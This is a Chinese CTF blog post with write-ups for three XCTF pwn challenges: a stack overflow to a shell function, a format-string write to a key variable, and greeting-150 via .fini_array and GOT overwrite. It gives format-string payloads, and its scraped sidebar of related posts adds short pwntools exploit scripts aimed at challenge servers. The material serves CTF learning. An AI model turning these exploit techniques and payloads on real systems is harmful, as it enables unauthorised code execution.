xctf-pwn-“反应釜开关控制 & 实时数据监测 & greeting-150“

最新推荐文章于 2023-06-03 10:36:20 发布
原创 最新推荐文章于 2023-06-03 10:36:20 发布 · 429 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了一次利用格式化字符串漏洞进行的复杂攻击过程,通过三次栈溢出获取shell函数地址,重点介绍了如何绕过 PIE 保护并利用 .init_array 和 .fini_array 功能实现多次任意地址写,最终实现权限提升。涉及技术包括栈溢出、格式化字符串、ELF文件、初始化代码与终止代码、恶意代码注入等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

反应釜开关控制

该pwn题目逻辑较为简单。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
通过三次栈溢出,可以得到shell函数地址。
在这里插入图片描述
发现PIE保护没有开启,其实这里是直接可以栈溢出到shell函数的地址的,不必弄那么复杂!
在这里插入图片描述
这道题目的PIE应该是忘记开了,题目原本设计的目的是想让我们使用三次栈溢出来得到shell的。
分界线
这里我感觉应该不是这么简单的,所以我又去进行寻找资料,发现是XCTF 4th-CyberEarth里面的盲打题。意味着我们没有ELF文件,所以我们就没有办法来想这么简单的去做出来。

实时数据监测

发现什么保护都没有开启。
在这里插入图片描述
然后看一看代码。
在这里插入图片描述
关键是利用格式化字符串进行任意地址写,将key地址里面的数值进行覆盖。
在这里插入图片描述
偏移量应该是12,而key的地址为0x0804A048,需要将key的值覆盖为35795746即可。转换为发送数据为22 33 22 02。

\x22=34  		\x33=51  		\x22=34           \x02=2
18+16=34=0x22   34+17=51=0x33   51+239=290=0x122  290+224=514=0x202
数据在内存中是小端序%hhn会写入单字节
构造如下:
%18c%12$hhn%17c%13$hhn%239c%14$hhn%224c%15$hhn
也可以使用fmtstr_payload函数
payload = fmtstr_payload(12,{key_addr,35795746})

在这里插入图片描述

greeting-150

在这里插入图片描述
在这里插入图片描述
并且可以发现存在system函数。
在这里插入图片描述
这个时候我们可以先确认偏移量!
在这里插入图片描述
通过判断发现不存在栈溢出漏洞,也就是说我们只有一个格式化字符串漏洞,但是如果仅仅靠格式化字符串漏洞,可以达到一次的任意地址写,但是仅仅通过一次任意地址写,是达不到我们想要的地步,所以我们必须想办法将该格式化字符串漏洞可以多次利用!

大多数可执行文件是通过链接 libc 来进行编译的,因此 gcc 会将 glibc 初始化代码放入编译好的可执行文件和共享库中。
.init_array和 .fini_array 节(早期版本被称为 .ctors和 .dtors )中存放了指向初始化代码和终止代码的函数指针。
.init_array 函数指针会在 main() 函数调用之前触发。这就意味着,可以通过重写某个指向正确地址的指针来将控制流指向病毒或者寄生代码。
.fini_array 函数指针在 main() 函数执行完之后才被触发,在某些场景下这一点会非常有用。
例如,特定的堆溢出漏(如曾经的 http://phrack.org/issues/57/9.html )会允许攻击者在任意位置写4个字节,攻击者通常会使用一个指向 shellcode 地址的函数指针来重写.fini_array 函数指针。
对于大多数病毒或者恶意软件作者来说, .init_array 函数指针是最常被攻击的目标,因为它通常可以使得寄生代码在程序的其他部分执行之前就能够先运行。

在这里插入图片描述
此时我们利用一次任意地址写,覆盖.fini_array函数指针。然后可以进行覆盖strlen的got地址为system的plt地址。第二次main函数时就输入’/bin/sh’,调用strlen时候实际上调用的是system("/bin/sh");该函数。
在这里插入图片描述
利用该脚本可以得到权限!

实时数据监测(xctf)
weixin_43868725的博客
05-24 959
0x0 程序保护和流程 保护: 流程: main() locker() imagemagic() 当key=35795746=0x2223322时调用system("/bin/sh"),在imagemagic()中又存在格式化字符串漏洞。所以只需要更改key的值即可。 0x1 利用过程 先确定偏移量。 偏移量为12。但是我们要向key的地址写入35795746=0x2223322,如果一次性写入35795746个字符的话输入缓冲区可能会溢出导致程序无法运行。所以我们选择单字符写入所以payloa
反应釜开关控制(xctf)
weixin_43868725的博客
05-24 796
0x0 程序保护和流程 保护: 流程: main() gets明显存在栈溢出。又在函数列表中找到了shell()函数。 0x1 利用过程 直接覆盖return的地址payload=0x208*‘a’+p64(0x4005F6) exp from pwn import * #sh=process('./a') sh=remote('124.126.19.106','53303') sh.recvuntil('>') payload=0x208*'a'+p64(0x4005F6) sh.sendli
[XCTF-pwn] 3-反应釜开关控制
weixin_52640415的博客
03-03 203
溢出到后门 from pwn import * p = remote('111.200.241.244', 53046) p.sendline(flat(b'A'*(0x200+8), 0x4005f6)) p.interactive()
攻防世界 pwn——反应釜开关控制
CNS-Enterprise BCC-1701-J
06-03 434
攻防世界 做题练习
greeting-150(xctf)
weixin_43868725的博客
08-10 745
0x0 程序保护和流程 保护: 流程: main() 存在一个明显的格式化字符串漏洞。 0x1 利用过程 1.格式化字符串漏洞的出现代表着只要有权限,就能完成任意地址写。而题目的保护是没有开启重定位表只读保护,所以可以修改函数的got表。所以可以修改一个参数由输入决定单参数函数的got表为sysytem函数的地址,这样就当输入**/bin/sh**的时候就可以完成getshell了。通过观察程序,决定修改strlen函数的got表。 2.由于需要二次输入,涉及到控制程序流程。而控制流程需要一个可执行的指
[XCTF-pwn] 4-实时数据监测
weixin_52640415的博客
03-03 262
格式化字符串漏洞,在指定位置写入指定值 from pwn import * p = remote('111.200.241.244', 59708) context(arch='i386', log_level='debug') p.sendline(fmtstr_payload(12, {0x0804A048 : 35795746})) p.interactive()
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 715
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-19 438
题目下载地址:点此下载 查保护 只开启了NX 查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。 这题比较简单,就不写详细解释了,直接上EXP。 EXP: # -*- coding: utf-8 -*- # @Author: 夏了茶糜 # @Date: 2020-03-19 14:01:14 # @email: sxin0807@qq.com # @Las...
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1810
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
string [XCTF-PWN]CTF writeup系列7(超详细分析)
重新启程
12-20 4207
题目地址:string 先看看题目情况 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 167e00a26ef44e1f888b3ede29d88e38 [*] '/ctf/work/python/167e00a26ef44e1f888b3ede29d88e38' Arch: amd64-64-little RE...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1948
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
xctf 实时数据监测
Tw0的博客
10-14 1794
练习记录 一道简单的格式化字符串漏洞题目,题目所有的保护都没有开。easy,但是还是花了我好久来复习,毕竟时间长了,格式化字符串的学习都快忘记了。 总结: 1、用gdb来查看的偏移地址中,左边的是低地址的内容,右边是高地址的内容。 再后面的22就是0x804a048地址中的内容,而02就是0x804a04b地址中的内容了。 2、ida中反汇编出来的数值和gdb中看到的是一样的。都是小端序排列的数据。 3、存入地址中是以十六进制存储的,所以22代表前面输出过34个字节的数据了...
攻防世界 Pwn 实时数据监测
MrTreebook的博客
12-12 656
攻防世界 Pwn 实时数据监测1.题目下载地址2.checksec3.IDA4.格式化字符串漏洞的解法5.exp 1.题目下载地址 点击下载 2.checksec 什么保护都没开,估计是很简单的题 进IDA分析一下 3.IDA int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); if ( key == 35795
非预期解 |攻防世界 pwn进阶 反应釜开关控制
Kni9hT's Blog
04-20 1091
文章目录菜鸡独白0x00.看题0x01.查看保护0x02.懵...非预期0x03.后记 菜鸡独白 好久没做题了,看大佬们天天在朋友圈晒比赛成绩,不由感叹WTCL! 今天下午无聊继续刷起ADworld。 0x00.看题 题目描述:小M在里一个私人矿厂中发现了一条TNT生产线中硝化反应釜的接口,反应釜是一种反应设备,非常的不稳定,会因为很多原因造成损坏,导致生产被迫停止。她怀疑这个工厂可能进行地下军火...
[攻防世界 pwn]——反应釜开关控制
Y_peak的博客
02-23 445
[攻防世界 pwn]——反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit from pwn import * p = remote("111.200.241.244",31931) payload='a' * (0x200 + 8)+p64(0x4005F6) p.sendlineafter('>',payload) p.interactive() ...
[攻防世界 pwn]——实时数据监测
Y_peak的博客
02-27 731
[攻防世界 pwn]——实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746,就好 写个小脚本在pwndbg中看看偏移 from pwn import * p = process('./pwn') gdb.attach(p, 'b *0x080484A7') #p = remote("111.200.241.244",48715) key_addr = 0x0804A048 p
攻防世界:PWN刷题-反应釜开关控制
m0_53932372的博客
12-30 2063
反应釜开关控制 思路:没有开启pie,并且直接有system("/bin/sh"); 和ret2text方法一样。 exp: #!/usr/bin/python from pwn import * p = remote(“111.200.241.244”,52515) payload=b’a’*512+b’b’*8+p64(0x00004005F6) p.sendline(payload) p.interactive() ...
攻防世界 Pwn 反应釜开关控制
MrTreebook的博客
12-12 480
攻防世界 Pwn 反应釜开关控制1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 只开启了NX,并且是64位程序 3.IDA分析 看到一个gets函数,并且没有边界限制 存在溢出可以利用 再往下看其他的函数 虽然题目给了很多函数,但是没开canary,没开PIE 没有什么难度,直接ret到后门函数即可 .text:00000000004005F6 public shell .text:0000000000
攻防世界xctf-实时数据监测 wp
Casuall的博客
08-14 1394
本题是一个简单的格式化字符串漏洞的利用。先查看一些文件的信息,32位的程序,保护措施没有开。 用IDA查看一些伪代码,发现main函数里面只有一个locker函数,locker函数首先接受了一个字符串s,然后调用imagemagic函数,这个函数跟进去查看其实就是一个printf函数,最后比较key的值是不是为0x2223322,如果相等,返回shell,否则打印key的地址和值。 我们在本地运行一下看看,由于直接把key的地址告诉你了,所以本题的思路是找到格式化字符串地址的偏移,然后覆盖key的值。格
XCTF-WEB进阶-fakebook
最新发布
02-28
### XCTF WEB进阶 Fakebook 解题报告 #### 源码分析 Fakebook 类似于社交网络平台,在此环境中存在多个功能模块,包括但不限于用户注册、登录以及个人信息管理等功能。通过查看源代码发现,该应用可能存在多种安全漏洞。 对于假想的 `fakebook` 平台而言,其核心逻辑通常围绕着用户的会话管理和数据交互展开。假设存在如下简化版 PHP 伪代码表示部分关键业务流程: ```php <?php class User { public $username; public $password; function login($input_username, $input_password){ // 存在一个潜在的安全隐患:未对输入做严格验证 if ($this->username === $input_username && md5($input_password) === $this->password){ $_SESSION['logged_in'] = true; return "Login successful"; } return "Invalid credentials"; } } ?> ``` 上述代码片段展示了用户认证过程中可能存在的安全隐患——使用弱哈希算法 MD5 对密码进行了处理[^1]。 #### 安全问题剖析 基于以上描述可以推测出几个主要攻击面: - **弱哈希函数**:MD5 已经被证明不再适合用于保护敏感信息,因为它容易受到碰撞攻击的影响。 - **缺乏输入过滤机制**:未能有效防止恶意字符进入系统内部,这可能导致 SQL 注入或其他类型的注入攻击发生。 - **不恰当的错误消息返回**:当用户名或密码错误时给出的具体提示可能会帮助攻击者缩小猜测范围。 #### 利用技巧 针对这些弱点,参赛选手可以从以下几个方面入手尝试突破并解决问题: - 尝试暴力破解或者彩虹表查找已知 MD5 值对应的原始字符串; - 测试是否存在其他形式的数据注入风险点,比如 URL 参数、POST 请求体内的字段等位置; - 探索是否有任何地方暴露出过多调试信息给外部访问者利用; 成功完成挑战后一般可以获得 flag 或者进一步的操作权限作为奖励。 #### 复现过程 为了模拟真实的渗透测试场景,建议按照以下方式构建实验环境来进行练习: 1. 构建一个类似的 Web 应用程序框架,确保其中包含了所有必要的组件和服务依赖关系; 2. 实施相应的防护措施来抵御常见的Web 攻击手段,如 XSS 和 CSRF 等; 3. 使用工具辅助自动化执行某些特定任务,例如 Hydra 可以用来实施字典攻击尝试登陆接口; 4. 记录每一步操作细节以便后续总结经验教训,并分享给社区成员共同学习进步。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值